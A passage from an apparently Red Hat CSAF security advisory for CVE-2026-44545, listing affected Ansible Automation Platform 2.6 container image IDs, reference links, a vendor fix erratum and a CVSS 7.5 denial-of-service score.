"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "RHBZ#2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44545",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://github.com/django/daphne/blob/main/CHANGELOG.txt",
"url": "https://github.com/django/daphne/blob/main/CHANGELOG.txt"
}
],
"release_date": "2026-06-03T13:17:42.907000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
